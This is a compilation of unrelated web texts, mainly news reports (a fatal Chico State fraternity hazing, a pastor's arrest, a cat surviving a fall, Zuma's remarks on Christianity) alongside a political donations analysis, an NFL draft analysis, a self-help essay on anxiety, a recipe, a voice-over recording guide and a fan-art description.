9. You have at one point done a solo with your best friend, and it's an awkwardly emotional and beautiful experience that you don't want to talk about because people will think you're crazy. But you're not. They just don't get it.
10. You have experienced that heroin-like rush when you own that song, and everyone in the crowd knows you owned that song, and everyone in that room knows that you are a beast.
[divider] [/divider]
Are you in the a cappella cult? Join the club and tweet us @litdarling
Like this: Like Loading...
WABC 7 had this crazy story over the weekend: A cat fell 26 stories from a lower Manhattan building—and survived! And the cat's name is...Lucky! Apparently Lucky's owner had left a window in their apartment open 6 inches wide—which is more than enough for any enterprising cat to wander through. Lucky decided to walk out onto the ledge, but they slipped.
What's also amazing is that a window washing crew across the street took pictures! See them here—WABC 7 describes them, "First of Lucky perched dangerously on the ledge, and then a stomach-turning shot of Lucky midair. Finally, they captured Lucky, after landing, on their feet on a neighbor's balcony 26 stories below." Lucky was hospitalized briefly and seems to be fine and as cute as ever, judging by the video.
If you have any pets, do not leave unscreened windows open more than a inch. Here's the ASPCA on high rise syndrome.
A Fraternity Hazing Gone Wrong
toggle caption Frankie Dickinson
toggle caption Emily Wheeler/The Orion
toggle caption Emily Wheeler/The Orion
toggle caption Elaine Korry, NPR
toggle caption Elaine Korry, NPR
Enlarge this image toggle caption Courtesy the Smith Family Courtesy the Smith Family
toggle caption Elaine Korry, NPR
It's a parent's nightmare and a nagging fear for the people who run colleges and universities: A young fraternity pledge dies when hazing gets out of control. It's happened at least once each year for more than three decades. Nine months ago it happened at Chico State University in California, and this time prosecutors did something unusual: They filed felony criminal charges against the fraternity brothers involved.
But that's not much comfort to the family of Matthew Carrington, who died during the Feb. 2, 2005, hazing accident.
In their 22 years, Gabriel Maestretti has often been a role model: an altar boy, high school homecoming king and a volunteer coach. But in the past year he's also been called a "tormentor" and "a mean drunk." And earlier this month, they became something worse: a felon.
The Butte County courtroom of Judge Stephen Benson was awash in red, the color worn by family and friends of Matthew Carrington to honor him. Gabriel Maestretti, deeply religious as a boy, had never been in trouble before. Yet, according to the district attorney, they were the most culpable in Carrington's death. They stood before the judge, baby-faced, with the physique of a linebacker, choking back tears.
"I did what I did out of a misguided sense of building brotherhood, and instead I lost a brother. I will live with the consequences of hazing for the rest of my life," Maestretti told the court. "My actions killed a good person, and I will be a felon for the rest of my life, and I'll have to live with that disability, but I'm alive and Matt's not. "
Moments later, Maestretti and three of their fraternity brothers -- John Fickes, 20, Carlos Abrille, 22, and Jerry Lim, 25 -- were handcuffed and led off to jail.
Matthew Carrington would have turned 22 this month. They grew up with their younger brother in a small ranch-style house in Pleasant Hill, east of San Francisco. Debbie Smith has a giant portrait of their son on the fireplace mantle. Dozens of snapshots fill the coffee table and bookshelves.
"We did everything together as a family, so we have tons of pictures, and I have to have them out," they said. "I have this need to just be surrounded by him. I can't put them away."
Like a lot of moms, Debbie Smith says their son was destined for great things. But Carrington's plans weren't grandiose at all. They just wanted to graduate and get a good job, marry and have kids, their mother says. Now, they mourn the wedding she'll never attend, the grandchildren she'll never hold.
Boarded-up on the edge of campus is the Chi Tau fraternity house. From the outside, the white building doesn't look like a crime scene. The basement, says Chico Police detective Greg Keeney, the lead investigator on the case, is another story.
"It's kind of like the medieval castle dungeon," says Keeney. In February, at the time of Carrington's death, the dark and dirty basement would have been very cold, says Keeney. Repeatedly scribbled on the walls was the phrase, "In the basement, no one can hear you scream."
Carrington died during Chi Tau's "Hell Week." Junior fraternity brothers were in charge and were told to be tough on the pledges. Carrington was at the Chi Tau, located in Chico, Calif., north of Sacramento to support their friend, Mike Quintana. Both were sober, according to police reports.
The two pledges were ordered downstairs and told to do calisthenics in raw sewage that had leaked on the floor. For hours, according to district attorney Mike Ramsey, they were interrogated and taunted.
There were forced pushups and trivia quizzes. Through it all, the Carrington and Quintana were ordered to drink from a five-gallon jug of water, which was filled over and over. Fans blasted icy air on their wet bodies. They urinated and vomited on themselves. Then, according to DA Ramsey, something went terribly wrong.
Carrington collapsed and started a seizure. Fraternity members didn't initially call an ambulance. By the time they did, it was too late. Carrington was taken to Enloe Medical Center, where their heart stopped. At about 5 a.m. they were pronounced dead from water intoxication, which caused the swelling of their brain and lungs. Not a single fraternity brother was there, a fact that still haunts their mother.
"All I could think of was, 'Matt's alone. Nobody is with him... why is that?' " they said. Hours passed from the hospital's first call to Carrington's parents before they learned how they died.
Hazing is illegal in the majority of states, including California. But usually it's a misdemeanor offense that brings a slap on the wrist. Most colleges have banned hazing, and rogue Greek chapters have been suspended. But sometimes the strategy backfires. Hazing expert Hank Nuwer says once they're decertified, these chapters are accountable to no one.
"It's kind of like having unregulated gangs on campus, and yet it's a hidden problem that doesn't get discussed on the news a lot," says Nuwer.
It was a problem at Chico State. Chi Tau was among a handful of suspended fraternities that had been in trouble before. For now, the school has shut down all Greek recruitment. A task force is overhauling all the rules for student conduct. And University President Paul Zingg has threatened the ultimate punishment -- an outright ban on fraternities and sororities.
"They talk about integrity and scholarship and holy friendship forever," says Zingg. "And I basically said, if that's really what you believe in, you've got a respected place on this campus. But if you're nothing but drinking clubs masquerading as fraternities, you don't."
Fraternity members pass the now-defunct Chi Tau house everyday on their way to classes. It's a vivid reminder of Carrington's death.
"We're still dealing with it. Everybody's still kind of haunted by it," says Adam Cherry, a Chico State junior and a member of Sigma Pi, a fraternity which they say doesn't haze. They think it's only right that the defendants are in jail. But they resent being lumped together with the young men implicated in Carrington's death.
"This fraternity, Chi Tau, was not recognized by the school, not recognized by anybody. So basically they were just a bunch of guys with letters on their house," says Cherry.
There's a growing movement to toughen the penalties for hazing. Two states, New York and Florida, have done it already, and Carrington's parents say now it should be California's turn. They want hazing out of the education code and charged under the penal code, like other violent crimes. But even that's not enough, says Debbie Smith. Something else has to change: the mindset that considers hazing just part of college life.
"I understand that they didn't intend to kill Matt," they say. "My hope is that they learned something, that we all learned something, and that they can teach others from their experience so that we don't have to have this keep happening to our children."
It may be too late for Gabriel Maestretti, who will serve one year in jail. But he, too, wants to get the message out.
"I accept my punishment, with the hope that it will serve as a warning to others not to follow the path I did," they said during their sentencing. "Hazing isn't funny, it's not cute. It's stupid, dangerous. It's not about brotherhood, it's about power and control."
For other students, the message hasn't sunk in yet. Despite the trauma of Carrington's death, two more Greek organizations at Chico State have already been suspended for misconduct this semester.
Thursday, December 31, 2015
Griff Witte and Anthony Faiola in the Washington Post reports that Sweden is changing its tune some with respect to welcoming refugees.
Last fall, when the plight of Syrian refugees became international news, Sweden sprang into action:
"Sweden's prime minister headlined gala fundraisers, Swedish celebrities starred in telethons, and a country that prides itself on doing the right thing seemed to rally as one to embrace refugees fleeing for their lives. But after taking in more asylum seekers per capita than any other nation in Europe, Sweden's welcome mat now lies in tatters. Overwhelmed by the human tide of 2015, the center-left government is deploying extraordinary new border controls and slashing benefits in an unmistakable signal to refugees contemplating the long trek to Sweden in the new year: Stay out."
KJ
https://lawprofessors.typepad.com/immigration/2015/12/by-griff-witte-and-anthony-faiola-when-the-small-crumpled-body-of-3-year-old-alan-kurdi-washed-up-on-the-aegean-coast-sept.html
Cashew Cream Tofu
by JL goes Vegan: Food & Fitness with a side of Kale
Instructions
Place first four ingredients in a Vita-Mix (or other high-speed blender) and blend to a creamy consistency. Slice pressed and drained tofu into six cutlets. Preheat over to 400F. Pour cashew cream over the tofu, in a shallow baking dish, cover and let sit while preparing a side dish and allowing the oven to preheat. Place tofu cutlets on a baking sheet (with parchment paper) and press cashew pieces onto the top. Bake for 10 minutes. Flip tofu, pour remaining cashew cream over it, press in remaining cashew pieces. Return to over and bake for another 10 minutes. Salt and pepper to taste and serve.
This tofu is rich and thick with nutty flavor (I loved the crunch of the crumbled cashews). Two days later I reheated the tofu with leftover asparagus, chopped them up and served over a piece of toast for a hearty, delicious brunch.
I can't wait to play with more “creamy” sauces for tofu and tempeh!
Mr Zuma, South Africa's first Zulu president, told an event in their home province of KwaZulu-Natal that Christianity brought about "orphans" and "old-age homes" thereby destroying Africa's traditions, according to South Africa's Times newspaper .
"As Africans, long before the arrival of religion and [the] gospel, we had our own ways of doing things," they said.
"Those were times that the religious people refer to as dark days but we know that, during those times, there were no orphans or old-age homes. Christianity has brought along these things."
Mr Zuma's office later issued a statement saying that their comments had been reported in a "misleading manner" and were aimed at ensuring South Africans do not neglect African culture.
"While we should embrace western culture and Christianity, we should not neglect the African ways of doing things," said Mac Maharaj, presidency spokesperson.
However, South Africa's Council of Churches has said it was "deeply disappointed".
"We are just taken aback. We are shocked and we don't understand," said Reverend Mautji Pataki, SACC general secretary.
Rev Pataki said that it was the "calling" of Christians to care for the vulnerable of society.
"The Lord Jesus Christ was a friend to orphans and widowers and the old and the disabled. Wherever they are, we will do our ministry ... which is to take care of them. It's a calling. It's not a choice."
Mr Zuma is a devout follower of tribal custom, including polygamy. In January last year they wed their third wife at a traditional Zulu ceremony.
During the ritual wedding the bride, Madiba, 38, was introduced to the elders and ancestors, two years after Mr Zuma, 69, paid the Ilobolo (dowry).
In 2007, Mr Zuma was made an honorary pastor at a meeting of independent charismatic churches.
Mr Maharaj said Mr Zuma would meet religious leaders in the new year to discuss joint initiatives on social issues.
Millions of dollars in political funding in the last financial year did not come from direct payments to parties, but via so-called associated entities.
Political parties in Australia are required to declare money they receive from any entity provided it is over a certain threshold. While donations and payments to parties can be made directly, looking only at these payments will not reveal the whole story about where the money is coming from.
In the 2012-13 financial year, 22.5% of Labor's declared receipt dollars came through “associated entities”, amounting to approximately $7.5m. The proportion was similar for the Liberals at 22% and $6.9m.
Associated entities are entities such as foundations, businesses, companies or unions that meet certain criteria under the Commonwealth Electoral Act. They might be controlled by a political party or operate to benefit a political party financially, for example.
So a person or business can donate to one of these entities and, as a result, the name of the donor will not be declared by the political party, only declared by the entity. With a long list of entities on the AEC site, it's not exactly straightforward to find which entity belongs to which party.
Distancing the donor from the party is not the only use of entities, as they're legitimately used to manage investments and fundraise on behalf of the parties.
Here I've compiled every declared payment from a donor that has gone to the Labor party, Liberal and National party groups via an associated entity, to show the scale and complexity of this political funding.
Here's how money flows to the Coalition:
We can see most of the money comes by way of the Cormack Foundation, with $5.4m going to the Liberal party. Donors to the Cormack Foundation include Wesfarmers, the owner of Coles, and resource companies BHP Billiton and Rio Tinto.
A brief note on “donors”: the AEC appears to describe every entity that pays money to a party or associated entity as a donor, even for instances where it appears to be a financial return, such as from banks, or membership fees. I've kept their terminology throughout as it's impossible to distinguish actual donations from other payments, and indeed many entities may use things such as membership fees or event tickets in lieu of donations.
Another significant associated entity is the Free Enterprise Foundation, which came up earlier in this series when we looked at undeclared donations.
In contrast to the Liberal party, the flow of money to Labor is rather more complex (so much so I've used a network graph, rather than the Sankey diagram I used for the Coalition), with many more associated entities and donors. Here we can see the Labor party encircled by the large unions, which are listed as associated entities, which are in turn ringed by donors and other unions and associations:
The largest amount given to the Labor party comes from Labor Services and Holdings, which sent some $702,000 through to the party branches. The money flow isn't always one way, either; some Labor party branches give significant amounts to other entities, which in turn send money back to the Labor party group.
The Greens received only two donations from two associated entities, CEPU Engineering ($5000) and the Maritime Union of WA ($3000), so haven't been graphed.
Methods
I scraped the political party annual returns by party group to produce a list of payments received by each major party group (includes all branches), and recorded the AEC's categorisation of the entity as either donor, party or associated entity. I filtered and grouped this dataset by each unique associated entity and its total payment to a party.
Then I constructed a similar dataset for all the returns declared by associated entities to produce a list of all the donors who had donated to associated entities. I filtered this list to include only associated entities that had made payments to a political party, and joined the two sets together.
Graphs were produced with D3.js. Here's a bonus graph of Labor using the Sankey layout, and the Coalition using the network layout.
The raw data is available here and here.
Update
I've added a footnote to the graphs to make it clear these show all money flows, not just donations. Worth mentioning again, since a number of commenters have brought it up: the AEC appears to describe every entity that pays money to a party or associated entity as a donor, even for instances where it appears to be a financial return, such as from banks, or membership fees. I've kept their terminology throughout as it's impossible to distinguish actual donations from other payments, and indeed many entities may use things such as membership fees or event tickets in lieu of donations.
Outcomes Are Bullshit: Letting Go of Anxiety
My buddy calls it “the nervies”. They first told me about it while we were waiting to do our provincial Emergency Medical Responder exams. In these exams, you had to go in front of a panel of paramedics and treat an imaginary patient. If you do well, you get your license and you're allowed to legally work as an EMR (the lowest position on the EMS totem pole). It's a dreadful experience. Thankfully, my imaginary patients went on to live happy and prosperous lives, while my friend somehow managed to kill two out of three. Don't worry; they gave up their dreams of EMS shortly thereafter.
What my friend calls “the nervies” is anxiety, felt in the pit of your stomach. The more attached you are to an outcome, the worse it gets. It can make you act really weird around a person you're attracted to, get you to lose your composure on a job interview, or even make you draw a blank on an important exam. When life starts to veer away from the outcome you want, anxiety pops up to say “Hello”. Ironically, this is usually an internal battle. The thing you're feeling anxious over hasn't even happened.
How it starts
Despite my intentions, I can't write an article that pleases everyone. My fear is that it pleases no one. What if my writing brings nothing but ire and even my mom, the last bastion of hope, reads one of my articles and shakes their head in shame?
I know that's an irrational fear. My mom has made it pretty clear that they love everything that I create, and few things are universally hated.
I work in agriculture, and it's rarely relaxing. What if a hailstorm destroys our crops and we have nothing to sell? What if things just don't grow? What if no one is buying?
In short, my business would be ruined, my kids would go hungry, my wife would take them to their sisters, and I'd be found face down in a ditch. At least that's how my mind works. It glosses right over “Things working out OK” to “Worst possible outcome”.
Maybe your spouse called you and said, “I want to talk about something later”, in that voice. Maybe a meeting was announced at work, and you suspect that there might be layoffs in the future. Maybe you've been working on a potential client and you really hope they're going to go for your product.
No matter what, the reaction is the same: bad anxiety.
Anxiety that helps you survive, anxiety that crushes your dreams
Anxiety isn't entirely useless; it saved my butt all through high school. The deadline would loom, I'd panic, and suddenly the assignment was done. It also prevents me from taking stupid risks, such as trying to beat a train at the crossing or climbing into the bear exhibit at the zoo.
When our ancestors lived on the savannah, anxiety was a survival mechanism. You didn't venture out if you thought there might be a big cat lurking in the tall grass. You wouldn't get too close to the cliff side because you never know when it would break away.
While for many people these are still real concerns, we've eliminated most of the threats our ancestors had to deal with. However, our brains are still wired for a world that's long gone.
This is where bad anxiety comes into play. Bad anxiety hits when you start to worry about things you can't control or are extremely unlikely to happen. It's no longer a survival mechanism; it's time travel. Your body is present but your mind is 90% in some future that hasn't and probably won't occur. How can you possibly function like that?
The Road to Recovery
Recovering from anxiety requires you to recognize how much control you have over the outcome.
In A Guide to the Good Life: The Ancient Art of Stoic Joy, William Irvine talks about degrees of control:
1. Complete control
2. Some control but not complete control
3. No control
For example, I have complete control over whether I eat healthy or not. I don't have complete control over my health.
Not having complete control is what causes the issue. Sometimes you have influence (if I eat a lot of garbage, I'll increase my chances of disease) and other times, you have none (deteriorating health is a fact of life, no matter how healthy you eat).
I'm a manager in my job and I tend to feel anxiety when it comes to people. What if I ask someone to do something and they simply reply, “Nope, not doing it”. That imagined scenario alone has caused countless hours of anxiety. Over nine years, I can recall it happening one time. Was that one instance worth all that stress? All that energy circled the drain, all because I was scared of what someone might say.
Once you start time traveling, you give away all your power. Would you want to work for someone who shudders in fear every time you interact with them? My words and actions were carefully balanced so as to get the work done but avoid rejection. I would quietly exhale each time after a person said, “Ok, I'll do that”. I felt like an imposter after every interaction.
Next time you feel this way, decide what degree of control you have. If you have complete control, get up and do what you have to do. If you have some but not complete control, do what you can. If you have no control, waste no time thinking about it. Just like attaching to an outcome, deciding your degree of control is a habit. Eventually, you won't worry about things outside of your control at all.
On a particularly stormy night, I decided that our crop was finished. The dreaded day had come. I had to make a career change — pronto! I made a list of my skills, wrote down an income I'd be satisfied with, and looked up the provincial wages for trades. I decided to become a millwright. The kids would see me less but they'd understand. This was no longer about what people wanted; it was survival. I ordered a few millwright books from Amazon and tried to get some sleep.
As it turned out, the crops were unharmed and the millwright books made terrific paperweights. Aside from my bruised ego, everything turned out just fine. Anxiety (or more specifically, attaching to an outcome) makes fools of us all.
0 Pastor charged with sexual battery: 'I allowed the devil to motivate my mind'
GASTON COUNTY, N.C. - A Gastonia pastor said the devil led them to a Super 8, where police said they asked a woman for sex.
Officers told Channel 9 that the pastor said they thought the woman was a prostitute and threw a $20 bill at them
Robert Harris said Wednesday they will tell their congregation that they asked for sex from a woman in a Gastonia motel.
They said they will ask for their forgiveness and it will be up to them to decide if they keep them as their leader
Harris has been the pastor at Harriett Memorial Freewill Baptist Church in Forest City for the past 13 years.
They said they had counseled a couple at the Super 8 in Gastonia 10 years ago.
They went back last night knocking on a woman's door.
The woman said they did not want to be identified.
"He asked me if I wanted to have some fun,” they said.
They told them no. They left and they called 911.
Them baby was on the bed and they were on the phone with police when Harris came back.
"(He) tried to push themselves in on me. Threw me a $20 bill and said, 'There is more where that came from. Just let me in for a few minutes,' knowing my 12-month-old daughter was right there with me,” the woman said.
The officer on the phone said they heard Harris making vulgar requests to the woman.
The arresting officer said Harris claimed they had come to that hotel in the past for sex.
Channel 9 spoke to Harris by phone.
“I should never have been in that place, period,” Harris said.
They said they had never seen that woman before and wanted to apologize to them
"I beg for their forgiveness that I was wrong. I asked God to forgive me,” they said.
They said they hadn't told their family or parishioners.
They said they wanted to go to God in prayer first.
"I have ruined my life. I have ruined my ministry. I have ruined my family,” Harris said.
Their accuser was stunned when we told them that Harris was a minister.
They think any punishment they receive should be far greater than the average person.
"He is abusing the people, not just me," they said.
Harris said they had not forgiven themselves for what they have done.
Self-driving cars may have to make the moral decision of who lives and who dies during a crash, according to a report.
“As you approach a rise in the road, heading south, a school bus appears, driving north, one driven by a human, and it veers sharply toward you. There is no time to stop safely, and no time for you to take control of the car,” USA Today explained. “Does the car: A. Swerve sharply into the trees, possibly killing you but possibly saving the bus and its occupants? B. Perform a sharp evasive maneuver around the bus and into the oncoming lane, possibly saving you, but sending the bus and its driver swerving into the trees, killing them and some of the children on board? C. Hit the bus, possibly killing you as well as the driver and kids on the bus?”
The moral dilemma has been heavily discussed with the advancement of self-driving vehicles.
According to USA Today, “Azim Shariff, an assistant professor of psychology and social behavior at the University of California, Irvine, co-authored a study last year that found that while respondents generally agreed that a car should, in the case of an inevitable crash, kill the fewest number of people possible regardless of whether they were passengers or people outside of the car, they were less likely to buy any car ‘in which they and their family member would be sacrificed for the greater good.'”
In their report, USA Today continued to claim that while self-driving cars “could save tens of thousands of lives each year,” consumer fears, particularly surrounding the crash dilemma, “could slow down acceptance, leaving traditional cars and their human drivers on the road longer to battle it out with autonomous or semi-autonomous cars.”
“Already, the American Automobile Association says three-quarters of U.S. drivers are suspicious of self-driving vehicles,” they proclaimed.
As Breitbart previously reported, MIT's Moral Machine interactive website lets users explore the moral quandaries presented in life-and-death decisions being made by autonomous vehicles.
(First reported by Breitbart) http://www.breitbart.com/tech/2017/11/25/report-self-driving-cars-will-decide-dies-crash/ (November 26, 2017)
Let's face it - we have plenty of holes on the team for 2014, with the most obvious being on our lines. We will most likely have two open positions on the offensive side of the ball, with the center spot also primed for competition. On defense, we need a stronger defensive tackle, as well as a pass rushing threat at defensive end.
On top of that, Decoud's performance has been consistently degrading since their 2009 season as a second year player. We need a Tight End that can fill in for Tony Gonzalez, if that's possible, but we also haven't seen anyone get enough snaps. Weatherspoon's short tenure on the field has yielded some rough results, with missed tackles piling up similarly to previous years. Since the bye week, William Moore has had a rough season after starting pretty hot.
As we all juggle the team's needs and think about the draft, the consensus easily falls on the offensive and defensive lines, for good reason. The offensive line has allowed the fourth most combined sacks or hits through week 11. Of those 4 teams, Matt Ryan has the second shortest time-to-throw (behind Ryan Tannehill). Depending on how the line shuffles out this season, we will most likely look for a Guard or Tackle through the draft. Along with a Free Agency pickup, we can hope this will help solidify the line for a more successful 2014
As we think about our first round pick, the question becomes what position do we target? Through this and an additional article on the defensive side, we hopefully have a little insight into what we can expect to see from Thomas Dimitroff, Mike Smith, and the rest of the Front Office.
ProFootballFocus Grades: Rookie Year
ProFootballFocus (PFF) started grading in 2008, so the performance reviews will mainly relate to draft picks between 2008 and 2013. I also ran reports from ProFootballReference (PFR) to get a list of picks. I matched these two sets of information, which can be annoying when shortened names or suffixed are used...but I digress.
During this period, 242 offensive linemen were selected. Of those, I broke down, by round, the percentage of players that ended up playing a significant number as snaps, which I define as 300 or more. The current pace is projected for the year for 2013 draft picks
It's interesting to see the percentage stay the same into round 2. After that, the expectations drop dramatically...but what about the performance of those players?
To establish this, I took a weighted PFF grade based on the number of snaps played, and multiplied this per snap rating by 60. This, in theory, should give us an average one-game PFF score for each player. When averaging those grades in each round, I get these results:
Again, we see no drastic difference in performance between the first (+0.1) and second (0.0) round. Those are both relatively neutral grades. After the second round, like above, performance falls off drastically. This got me thinking, when does the average performance really start to slow down? Is the first round average deflated between high picks and late picks?
13 Offensive Linemen have been taken as a top-10 pick over the past 6 drafts. Comparing those players with other picks in the first two rounds, here's the percentage of players grading positively:
Yet again, we see that, historically, there's not a big difference between top-10 picks and picks made later in the first round OR into the second round. Though the top-10 graph is slightly higher, statistically there's not a big enough gap to conclude anything. This provides good insight into what we can expect from our draft picks for the 2014 season, though I'm sure you're also concerned about subsequent performance.
PFF Grades: Second Year
Using the same information as above, the following charts show a player's performance their second year in the league. Obviously, players drafted in 2013 cannot be included. Since the above analysis shows poor results after the second round, these charts will be limited to just first and second round picks.
What does each data set suggest with complete agreement? Second round picks are not as reliable in their second year on the field. Their grades decrease slightly, though the same portion of players see a significant number of snaps.
It also shows that first round picks have a higher proportion of players seeing the field, as well as showing moderate performance improvement. A PFF grade at +.32 per game would be +5.5 over a season. Comparing this number with offensive line grades from last year would put a player in the top 40%. However, by looking at the top-10 picks, I get the sense that projected performance can be highly unreliable. Hype can drive up a player's value, allowing better linemen to fall in the draft.
I found it odd that less than half of first and second round picks ended up with positive grades after two years. So, I wanted to see the how the results have looked by year. Here's something interesting.
Since 2008, lineman success rates have been falling, with the 2013 results being the worst so far. It would be hard to find the root-cause of this, but it sure suggests that scouts have a harder time gauging potential success in the NFL, or the player capabilities just are not keeping up. Let's hope 2014 is different...
Longer-Term Results
To take the results a step further, I wanted to look at draft picks in the 10 years prior to PFF grading, so 1998 - 2007. Since we don't have any performance grades, counting the number of All-Pros and Pro-Bowlers should give a good comparative measure between first and second round pick performance. 94 linemen were drafted in the first two rounds during that stretch. As a percentage of picks, here's how the rounds compare in generating players that receive either recognition. This information was pulled from PFR.
As you can see above, first round draft picks have more than twice the success of achieving either honor.
Draft Combine Results
I won't sit here and spit off a bunch of statistics about the NFL Combine. It's hard to take all the results and predict performance - yes, I created formulas. I found weak individual predictors, though combinations of variables resulted in a decent grading system. Without getting too specific, I will tell you that two variables seem to have a decent correlation with success: Weight, and Bench Press Reps:
First, lets look at the average PFF grades, separated by weight range when at The Combine:
There were a few players below and above these ranges, but too few to chart performance. In short, this display shows that being under weight has a significant impact on NFL success.
On the bench press, it's not necessarily how many reps a player puts up in general. It's how they compare to others within the weight group. For players receiving a +0.5 per game PFF grade their rookie year, 78% bench pressed more than average. For those receiving grades worse then -0.5 per game, only 40% of those can say the same. Again, it's not a perfect predictor, but it's actually a little better than the draft success from the previous 6 years...
Our Current Line Problems:
Looking at our current offensive line grades, let's rank each "starter" - whatever that means...
Blalock has been pretty consistent on the year, and ranks well among Guards in the NFL. Reynolds, though grading positively on the season, has been horrible the past three games. They went from averaging a +1 grade to -1. Trueblood has also been bad, getting worse the past three games, as well. Holmes had a very, very shaky start to the season while jumping around the line and getting up to speed. They have not put in great scores these last few games, but it is a drastic improvement. Konz has been pretty awful all season, though the performance has accelerated downward.
Hawley put in grades of -0.1 against Tampa and +2.2 against New Orleans. Though it's limited exposure, we're talking about two teams with defensive fronts that don't slouch. I think this is promising, and along with Holmes, we can hopefully rely on improvements the rest of the year.
At their current pace, Reynolds would grade at -16 on the season, which would put them 5th worst in 2012 and 14th worst if we push forward the 2013 grades. Trueblood would also grade -16, which would land at 7th worst in 2012, 9th worst in 2013. Regardless of selecting a lineman in the first or second round, we can most likely expect an improvement at either position.
As an additional review of our line, I wanted to share their Combine results. The following players are all in the same weight group that averages 23 Bench Press Reps: Konz only put up 18, Trueblood came out with 20, and Reynolds had 19.
Holmes barely fell short, with 22 compared to the 23 average. More impressively, Hawley put up 35 compared to a 19 average, and Blalock came in with 40 reps compared to their peers at 23.
Just sayin'...
What does all this imply?
While a first round draft at offensive line would be great, we don't necessarily need one to improve the status quo. Our performances at Tackle and Guard are so bad that a pick in the second round will most likely give us better protection for Matt Ryan and run blocking for SJax/Quizz/Snelling/Smith/Vaughn (like the latter two will get many carries...). This draft has a unique depth of talent on the offensive line. 16 players are currently projected to go in the first 2 rounds. Compare that to a 9 per year average between '98 and '07, and 11 between '08 and '13. This makes me think that we have the flexibility to look elsewhere if there's a better player available at a position of need.
Lineman success can come from many different places and be a combination of different fundamentals. I will specifically be wary of any lineman under 300 pounds, though none of the projected first or second-rounders come in under that right now. I will also look for players that show weakness compared to their peers on the bench press. Like I said previously, it's not a perfect predictor, but just thinking about what linemen do, it makes sense to perform well in that category. I can also hope that the Falcons' front office will look beyond the hype and objectively gauge each player, especially for offensive linemen. The previous three drafting years have yielded poor results at the line, and I would hate to keep that trend going...
Now, with all this said, numbers and history are just that - numbers and history. Each draft possesses a batch of unique players with identifiable talent. Game film and interviews can tell coaches a lot about player potential that statistics just can't. So while I can make the argument that our offensive line pick can come in either the first or second round, data analysis cannot capture intangibles. I just hope our recent scouting success carries over to next year.
Next up, I'll take a look at the other side of the football, where we desperately need help, as well. Feel free to discuss what you think about the draft options we have for the offensive line next year, and ask any questions or for additional information!
For our recording environment, we're using a very small, alcove-like dressing room space - really just enough room for one person to stand in. We've treated the walls and ceiling with our acoustic panels, bass traps, and throw pillows, we've placed carpet panels on the floor, and we have hung up an old bed comforter behind us to close in the space. For VO, you really want your space to be as acoustically "dead" as possible, which means you want to minimize reflections, reverberation, echo, etc...the maximum amount that you can.
Pictured is the view looking into the space to give you an idea of the finished setup. Behind the camera (not pictured) would be the bed comforter hanging up.
The Setup
So we've got all of our gear, and we've got a nice place to record in. Now it's time to look at how we will actually setup and use our gear in our recording space, to provide the best results.
Mic Position
The first important consideration is Mic Position. We'll need to properly setup our mic to give us the best sound, and minimize things like mouth noise and any environmental ambiance. There is no one correct way to do this, but there are a lot of popular and regularly used mic positions. A popular one that we will use in this case study, is to place the mic 6-8 inches away from your mouth, then move it a few inches off axis either to the right or left and angle it back towards your mouth. This way, the air coming from your mouth isn't hitting the microphone directly, but the microphone is still facing the source of the sound.
Your pop filter should be placed straight in front of your mouth, in the line of the air that comes out so it can catch any plosives.
Another idea you can try is to setup your mic so that it is in a corner and facing out, so that you are speaking into a corner, rather than into a flat surface. This can also help minimize reflections.
Surface Behind You
While it's important to treat all of the surfaces in your recording space with absorptive material, arguably the most important is the surface behind you as you speak. This is because while your microphone is facing you, it is also facing the surface behind you and is prone to catching any reflections that come off of it. This is why we hang a big heavy bed comforter behind us.
Input Gain
We'll also need to take into consideration the input gain on our recording interface. If it is too low, it will not pick up a strong enough signal from our voice, and we would need to rely heavily on post-production to get our audio up to an acceptable volume, and doing so would likely bring about other complications.
If it is too high, it will likely capture more room noise and ambiance than we would like, and could possibly clip or distort if we recite a portion of our VO particularly loudly.
So for our example, we will start with our input gain rolled all the way down, and slowly bring it up until the recorded audio is at a good audible level. This is a sort of quick and dirty way to do this, but will serve our purpose for this case study.
The IRig PRE we are using simply has a rolling wheel without any numbers to signify how high our gain is turned up, so I have no concrete numbers to give you, other than that the wheel was turned up maybe 25% or so. Setting input levels will be different depending on your interface and is something you should put time and care into doing.
Our Raw Audio:
So now we have acquired our gear, designed our recording space, and set up all of our equipment properly. Here is the raw audio that results from this setup, which we will enhance further through processing in our next section.
Light up, light up,
as if you have a choice!
Even if you cannot hear my voice,
I'll be right beside you, dear...
Louder, louder,
and we'll run for our lives!
I can hardly speak, I understand
why you can't raise your voice to say...
Snow Patrol, Run
Twitter: @ImpalaXTwiSpark Tumblr: impala99.tumblr.com #RainbowDash #DaringDo #Run#Impala2013This one took almost a week to finish because I was unsure of its composition and how I would work with it. Originally, I wanted to have some sort of futuristic setting, but after watching(during my 8th grade field trip to my local TouchStar Cinemas theater), I felt I wanted to do away with the fog - "I'm gonna put in some grass and a few rocks to make it look real" - it fell into place with ~ dadio46 's shard brushes and ~ redheadstock 's cloud mist brushes. Several layers of grass were put in front and behind Rainbow Dash and Daring Do (kindly provided by ~ craftybrony ), which could partially explain the large file size. The movie affect Photoshop action (from = fraggedICE ) was soon applied to give it feeling that it was actually from a movie (which isn't!)...I'm gonna leave it up to you to interpret what's going on in that scene... what's going on there? Why are Dashie and Daring running? Write a short fanfic if you need to!by ~ craftybrony was made as a wallpaper; however the AI file had Daring Do and a partially recolored Rainbow Dash that I could use for this one. The latter pony had to be recolored back to their original colors and minor modifications were made to the vectors for accuracy. The wing bandage and Daring Do's explorer outfit on Rainbow Dash stays, though.by Mariah Carey featuring Miguelby Snow Patrolby Sarah Brightman (fromby The OffspringCreated in Photoshop.Rainbow Dash and Daring Do from My Little Pony: Friendship is Magic © Hasbro, Inc. / DHX Media / The Hub / Discovery Communications.by ~ craftybrony Brushes by * s1088 , = charfade , ~ redheadstock , and ~ dadio46 Photoshop actions by = pstutorialsws and = fraggedICE Time: ~1 week.
Today in Gay History: The First Gay Protest
Many people say the first gay rights protest in the United States was the April 17, 1965 demonstration against the government's firing of gay and lesbian civil servants, including iconic activist Frank Kameny. Though that showing outside the White House was the most groundbreaking or memorable picket of its time, it was actually preceded by a protest that happened seven months earlier, on September 19, 1964.
That was the day Randy Wicker, Jefferson Poland, and eight other members of the Sexual Freedom League, six of them straight, gathered outside the army's induction center at 39 Whitehall Street in New York City to protest the armed forces's anti-gay discrimination and complicity in witch hunts. Their voices were for the most part ignored that day, but we all know that in the end they won: the army's official discrimination against gay and lesbian members ended in 2011.
